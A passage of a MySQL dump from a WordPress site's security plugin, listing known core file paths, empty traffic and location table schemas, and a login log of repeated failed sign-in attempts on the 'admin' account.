list.min.js'),(4078,'wp-includes/js/plupload/handlers.js'),(4079,'wp-includes/js/plupload/handlers.min.js'),(4080,'wp-includes/js/plupload/license.txt'),(4081,'wp-includes/js/plupload/moxie.js'),(4082,'wp-includes/js/plupload/moxie.min.js'),(4083,'wp-includes/js/plupload/plupload.js'),(4084,'wp-includes/js/plupload/plupload.min.js'),(4085,'wp-includes/js/plupload/wp-plupload.js'),(4086,'wp-includes/js/plupload/wp-plupload.min.js'),(4087,'wp-includes/js/quicktags.js'),(4088,'wp-includes/js/quicktags.min.js'),(4089,'wp-includes/js/shortcode.js'),(4090,'wp-includes/js/shortcode.min.js'),(4091,'wp-includes/js/swfobject.js'),(4092,'wp-includes/js/swfupload/handlers.js'),(4093,'wp-includes/js/swfupload/handlers.min.js'),(4094,'wp-includes/js/swfupload/license.txt'),(4095,'wp-includes/js/swfupload/swfupload.js'),(4096,'wp-includes/js/thickbox/loadingAnimation.gif'),(4097,'wp-includes/js/thickbox/macFFBgHack.png'),(4098,'wp-includes/js/thickbox/thickbox.css'),(4099,'wp-includes/js/thickbox/thickbox.js'),(4100,'wp-includes/js/tinymce/langs/wp-langs-en.js'),(4101,'wp-includes/js/tinymce/license.txt'),(4102,'wp-includes/js/tinymce/plugins/charmap/plugin.js'),(4103,'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),(4104,'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),(4105,'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),(4106,'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),(4107,'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),(4108,'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),(4109,'wp-includes/js/tinymce/plugins/directionality/plugin.js'),(4110,'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),(4111,'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),(4112,'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),(4113,'wp-includes/js/tinymce/plugins/hr/plugin.js'),(4114,'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),(4115,'wp-includes/js/tinymce/plugins/image/plugin.js'),(4116,'wp-includes/js/tinymce/plugins/image/plugin.min.js'),(4117,'wp-includes/js/tinymce/plugins/link/plugin.js'),(4118,'wp-includes/js/tinymce/plugins/link/plugin.min.js'),(4119,'wp-includes/js/tinymce/plugins/lists/plugin.js'),(4120,'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),(4121,'wp-includes/js/tinymce/plugins/media/plugin.js'),(4122,'wp-includes/js/tinymce/plugins/media/plugin.min.js'),(4123,'wp-includes/js/tinymce/plugins/paste/plugin.js'),(4124,'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),(4125,'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),(4126,'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),(4127,'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),(4128,'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),(4129,'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),(4130,'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),(4131,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),(4132,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),(4133,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),(4134,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),(4135,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),(4136,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),(4137,'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),(4138,'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),(4139,'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),(4140,'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),(4141,'wp-includes/js/tinymce/plugins/wplink/plugin.js'),(4142,'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),(4143,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),(4144,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),(4145,'wp-includes/js/tinymce/plugins/wpview/plugin.js'),(4146,'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),(4147,'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),(4148,'wp-includes/js/tinymce/skins/lightgray/content.min.css'),(4149,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot'),(4150,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg'),(4151,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf'),(4152,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff'),(4153,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot'),(4154,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg'),(4155,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf'),(4156,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff'),(4157,'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),(4158,'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),(4159,'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),(4160,'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),(4161,'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),(4162,'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),(4163,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),(4164,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),(4165,'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),(4166,'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),(4167,'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),(4168,'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),(4169,'wp-includes/js/tinymce/skins/wordpress/images/more.png'),(4170,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),(4171,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),(4172,'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),(4173,'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),(4174,'wp-includes/js/tinymce/skins/wordpress/images/video.png'),(4175,'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),(4176,'wp-includes/js/tinymce/themes/inlite/theme.js'),(4177,'wp-includes/js/tinymce/themes/inlite/theme.min.js'),(4178,'wp-includes/js/tinymce/themes/modern/theme.js'),(4179,'wp-includes/js/tinymce/themes/modern/theme.min.js'),(4180,'wp-includes/js/tinymce/tiny_mce_popup.js'),(4181,'wp-includes/js/tinymce/tinymce.min.js'),(4182,'wp-includes/js/tinymce/utils/editable_selects.js'),(4183,'wp-includes/js/tinymce/utils/form_utils.js'),(4184,'wp-includes/js/tinymce/utils/mctabs.js'),(4185,'wp-includes/js/tinymce/utils/validate.js'),(4186,'wp-includes/js/tinymce/wp-tinymce.js'),(4187,'wp-includes/js/tinymce/wp-tinymce.php'),(4188,'wp-includes/js/tw-sack.js'),(4189,'wp-includes/js/tw-sack.min.js'),(4190,'wp-includes/js/twemoji.js'),(4191,'wp-includes/js/twemoji.min.js'),(4192,'wp-includes/js/underscore.js'),(4193,'wp-includes/js/underscore.min.js'),(4194,'wp-includes/js/utils.js'),(4195,'wp-includes/js/utils.min.js'),(4196,'wp-includes/js/wp-ajax-response.js'),(4197,'wp-includes/js/wp-ajax-response.min.js'),(4198,'wp-includes/js/wp-api.js'),(4199,'wp-includes/js/wp-api.min.js'),(4200,'wp-includes/js/wp-auth-check.js'),(4201,'wp-includes/js/wp-auth-check.min.js'),(4202,'wp-includes/js/wp-backbone.js'),(4203,'wp-includes/js/wp-backbone.min.js'),(4204,'wp-includes/js/wp-custom-header.js'),(4205,'wp-includes/js/wp-custom-header.min.js'),(4206,'wp-includes/js/wp-embed-template.js'),(4207,'wp-includes/js/wp-embed-template.min.js'),(4208,'wp-includes/js/wp-embed.js'),(4209,'wp-includes/js/wp-embed.min.js'),(4210,'wp-includes/js/wp-emoji-loader.js'),(4211,'wp-includes/js/wp-emoji-loader.min.js'),(4212,'wp-includes/js/wp-emoji-release.min.js'),(4213,'wp-includes/js/wp-emoji.js'),(4214,'wp-includes/js/wp-emoji.min.js'),(4215,'wp-includes/js/wp-list-revisions.js'),(4216,'wp-includes/js/wp-list-revisions.min.js'),(4217,'wp-includes/js/wp-lists.js'),(4218,'wp-includes/js/wp-lists.min.js'),(4219,'wp-includes/js/wp-pointer.js'),(4220,'wp-includes/js/wp-pointer.min.js'),(4221,'wp-includes/js/wp-sanitize.js'),(4222,'wp-includes/js/wp-sanitize.min.js'),(4223,'wp-includes/js/wp-util.js'),(4224,'wp-includes/js/wp-util.min.js'),(4225,'wp-includes/js/wpdialog.js'),(4226,'wp-includes/js/wpdialog.min.js'),(4227,'wp-includes/js/wplink.js'),(4228,'wp-includes/js/wplink.min.js'),(4229,'wp-includes/js/zxcvbn-async.js'),(4230,'wp-includes/js/zxcvbn-async.min.js'),(4231,'wp-includes/js/zxcvbn.min.js'),(4232,'wp-includes/kses.php'),(4233,'wp-includes/l10n.php'),(4234,'wp-includes/link-template.php'),(4235,'wp-includes/load.php'),(4236,'wp-includes/locale.php'),(4237,'wp-includes/media-template.php'),(4238,'wp-includes/media.php'),(4239,'wp-includes/meta.php'),(4240,'wp-includes/ms-blogs.php'),(4241,'wp-includes/ms-default-constants.php'),(4242,'wp-includes/ms-default-filters.php'),(4243,'wp-includes/ms-deprecated.php'),(4244,'wp-includes/ms-files.php'),(4245,'wp-includes/ms-functions.php'),(4246,'wp-includes/ms-load.php'),(4247,'wp-includes/ms-network.php'),(4248,'wp-includes/ms-settings.php'),(4249,'wp-includes/ms-site.php'),(4250,'wp-includes/nav-menu-template.php'),(4251,'wp-includes/nav-menu.php'),(4252,'wp-includes/option.php'),(4253,'wp-includes/pluggable-deprecated.php'),(4254,'wp-includes/pluggable.php'),(4255,'wp-includes/plugin.php'),(4256,'wp-includes/pomo/entry.php'),(4257,'wp-includes/pomo/mo.php'),(4258,'wp-includes/pomo/plural-forms.php'),(4259,'wp-includes/pomo/po.php'),(4260,'wp-includes/pomo/streams.php'),(4261,'wp-includes/pomo/translations.php'),(4262,'wp-includes/post-formats.php'),(4263,'wp-includes/post-template.php'),(4264,'wp-includes/post-thumbnail-template.php'),(4265,'wp-includes/post.php'),(4266,'wp-includes/query.php'),(4267,'wp-includes/random_compat/byte_safe_strings.php'),(4268,'wp-includes/random_compat/cast_to_int.php'),(4269,'wp-includes/random_compat/error_polyfill.php'),(4270,'wp-includes/random_compat/random.php'),(4271,'wp-includes/random_compat/random_bytes_com_dotnet.php'),(4272,'wp-includes/random_compat/random_bytes_dev_urandom.php'),(4273,'wp-includes/random_compat/random_bytes_libsodium.php'),(4274,'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(4275,'wp-includes/random_compat/random_bytes_mcrypt.php'),(4276,'wp-includes/random_compat/random_int.php'),(4277,'wp-includes/registration-functions.php'),(4278,'wp-includes/registration.php'),(4279,'wp-includes/rest-api/class-wp-rest-request.php'),(4280,'wp-includes/rest-api/class-wp-rest-response.php'),(4281,'wp-includes/rest-api/class-wp-rest-server.php'),(4282,'wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(4283,'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(4284,'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(4285,'wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(4286,'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(4287,'wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(4288,'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(4289,'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(4290,'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(4291,'wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(4292,'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(4293,'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(4294,'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(4295,'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(4296,'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(4297,'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(4298,'wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(4299,'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(4300,'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(4301,'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(4302,'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(4303,'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(4304,'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(4305,'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(4306,'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(4307,'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(4308,'wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(4309,'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(4310,'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(4311,'wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(4312,'wp-includes/rest-api.php'),(4313,'wp-includes/revision.php'),(4314,'wp-includes/rewrite.php'),(4315,'wp-includes/robots-template.php'),(4316,'wp-includes/rss-functions.php'),(4317,'wp-includes/rss.php'),(4318,'wp-includes/script-loader.php'),(4319,'wp-includes/session.php'),(4320,'wp-includes/shortcodes.php'),(4321,'wp-includes/sitemaps/class-wp-sitemaps-index.php'),(4322,'wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(4323,'wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(4324,'wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(4325,'wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(4326,'wp-includes/sitemaps/class-wp-sitemaps.php'),(4327,'wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(4328,'wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(4329,'wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(4330,'wp-includes/sitemaps.php'),(4331,'wp-includes/sodium_compat/LICENSE'),(4332,'wp-includes/sodium_compat/autoload-php7.php'),(4333,'wp-includes/sodium_compat/autoload.php'),(4334,'wp-includes/sodium_compat/composer.json'),(4335,'wp-includes/sodium_compat/lib/constants.php'),(4336,'wp-includes/sodium_compat/lib/namespaced.php'),(4337,'wp-includes/sodium_compat/lib/php72compat.php'),(4338,'wp-includes/sodium_compat/lib/php72compat_const.php'),(4339,'wp-includes/sodium_compat/lib/sodium_compat.php'),(4340,'wp-includes/sodium_compat/namespaced/Compat.php'),(4341,'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(4342,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(4343,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(4344,'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(4345,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(4346,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(4347,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(4348,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(4349,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(4350,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(4351,'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(4352,'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(4353,'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(4354,'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(4355,'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(4356,'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(4357,'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(4358,'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(4359,'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(4360,'wp-includes/sodium_compat/namespaced/Core/Util.php'),(4361,'wp-includes/sodium_compat/namespaced/Core/X25519.php'),(4362,'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(4363,'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(4364,'wp-includes/sodium_compat/namespaced/Crypto.php'),(4365,'wp-includes/sodium_compat/namespaced/File.php'),(4366,'wp-includes/sodium_compat/src/Compat.php'),(4367,'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(4368,'wp-includes/sodium_compat/src/Core/Base64/Common.php'),(4369,'wp-includes/sodium_compat/src/Core/Base64/Original.php'),(4370,'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(4371,'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(4372,'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(4373,'wp-includes/sodium_compat/src/Core/ChaCha20.php'),(4374,'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(4375,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(4376,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(4377,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(4378,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(4379,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(4380,'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(4381,'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(4382,'wp-includes/sodium_compat/src/Core/Curve25519.php'),(4383,'wp-includes/sodium_compat/src/Core/Ed25519.php'),(4384,'wp-includes/sodium_compat/src/Core/HChaCha20.php'),(4385,'wp-includes/sodium_compat/src/Core/HSalsa20.php'),(4386,'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(4387,'wp-includes/sodium_compat/src/Core/Poly1305.php'),(4388,'wp-includes/sodium_compat/src/Core/Salsa20.php'),(4389,'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(4390,'wp-includes/sodium_compat/src/Core/SipHash.php'),(4391,'wp-includes/sodium_compat/src/Core/Util.php'),(4392,'wp-includes/sodium_compat/src/Core/X25519.php'),(4393,'wp-includes/sodium_compat/src/Core/XChaCha20.php'),(4394,'wp-includes/sodium_compat/src/Core/XSalsa20.php'),(4395,'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(4396,'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(4397,'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(4398,'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(4399,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(4400,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(4401,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(4402,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(4403,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(4404,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(4405,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(4406,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(4407,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(4408,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(4409,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(4410,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(4411,'wp-includes/sodium_compat/src/Core32/Int32.php'),(4412,'wp-includes/sodium_compat/src/Core32/Int64.php'),(4413,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(4414,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(4415,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(4416,'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(4417,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(4418,'wp-includes/sodium_compat/src/Core32/Util.php'),(4419,'wp-includes/sodium_compat/src/Core32/X25519.php'),(4420,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(4421,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(4422,'wp-includes/sodium_compat/src/Crypto.php'),(4423,'wp-includes/sodium_compat/src/Crypto32.php'),(4424,'wp-includes/sodium_compat/src/File.php'),(4425,'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(4426,'wp-includes/sodium_compat/src/SodiumException.php'),(4427,'wp-includes/spl-autoload-compat.php'),(4428,'wp-includes/taxonomy.php'),(4429,'wp-includes/template-loader.php'),(4430,'wp-includes/template.php'),(4431,'wp-includes/theme-compat/comments.php'),(4432,'wp-includes/theme-compat/embed-404.php'),(4433,'wp-includes/theme-compat/embed-content.php'),(4434,'wp-includes/theme-compat/embed.php'),(4435,'wp-includes/theme-compat/footer-embed.php'),(4436,'wp-includes/theme-compat/footer.php'),(4437,'wp-includes/theme-compat/header-embed.php'),(4438,'wp-includes/theme-compat/header.php'),(4439,'wp-includes/theme-compat/sidebar.php'),(4440,'wp-includes/theme.php'),(4441,'wp-includes/update.php'),(4442,'wp-includes/user.php'),(4443,'wp-includes/vars.php'),(4444,'wp-includes/version.php'),(4445,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(4446,'wp-includes/widgets/class-wp-widget-archives.php'),(4447,'wp-includes/widgets/class-wp-widget-calendar.php'),(4448,'wp-includes/widgets/class-wp-widget-categories.php'),(4449,'wp-includes/widgets/class-wp-widget-custom-html.php'),(4450,'wp-includes/widgets/class-wp-widget-links.php'),(4451,'wp-includes/widgets/class-wp-widget-media-audio.php'),(4452,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(4453,'wp-includes/widgets/class-wp-widget-media-image.php'),(4454,'wp-includes/widgets/class-wp-widget-media-video.php'),(4455,'wp-includes/widgets/class-wp-widget-media.php'),(4456,'wp-includes/widgets/class-wp-widget-meta.php'),(4457,'wp-includes/widgets/class-wp-widget-pages.php'),(4458,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(4459,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(4460,'wp-includes/widgets/class-wp-widget-rss.php'),(4461,'wp-includes/widgets/class-wp-widget-search.php'),(4462,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(4463,'wp-includes/widgets/class-wp-widget-text.php'),(4464,'wp-includes/widgets.php'),(4465,'wp-includes/wlwmanifest.xml'),(4466,'wp-includes/wp-db.php'),(4467,'wp-includes/wp-diff.php'),(4468,'wp-links-opml.php'),(4469,'wp-load.php'),(4470,'wp-login.php'),(4471,'wp-mail.php'),(4472,'wp-settings.php'),(4473,'wp-signup.php'),(4474,'wp-trackback.php'),(4475,'xmlrpc.php');
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflivetraffichuman`
--
DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`expiration` int(10) unsigned NOT NULL,
PRIMARY KEY (`IP`,`identifier`),
KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflivetraffichuman`
--
LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflocs`
--
DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`ctime` int(10) unsigned NOT NULL,
`failed` tinyint(3) unsigned NOT NULL,
`city` varchar(255) DEFAULT '',
`region` varchar(255) DEFAULT '',
`countryName` varchar(255) DEFAULT '',
`countryCode` char(2) DEFAULT '',
`lat` float(10,7) DEFAULT 0.0000000,
`lon` float(10,7) DEFAULT 0.0000000,
PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflocs`
--
LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflogins`
--
DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`hitID` int(11) DEFAULT NULL,
`ctime` double(17,6) unsigned NOT NULL,
`fail` tinyint(3) unsigned NOT NULL,
`action` varchar(40) NOT NULL,
`username` varchar(255) NOT NULL,
`userID` int(10) unsigned NOT NULL,
`IP` binary(16) DEFAULT NULL,
`UA` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`IP`,`fail`),
KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=6461 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflogins`
--
LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (4391,5933,1628814713.391723,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4392,5934,1628815180.676209,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4393,5935,1628815704.886036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4394,5936,1628816208.764165,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4395,5937,1628816699.014316,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4396,5938,1628817692.045823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4397,5939,1628818222.804726,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8-2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4398,5940,1628818744.107211,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4399,5941,1628819796.066977,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4400,5942,1628820241.377550,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(4401,5943,1628820340.597742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�1�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4402,5944,1628820869.907094,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4403,5945,1628821452.241065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 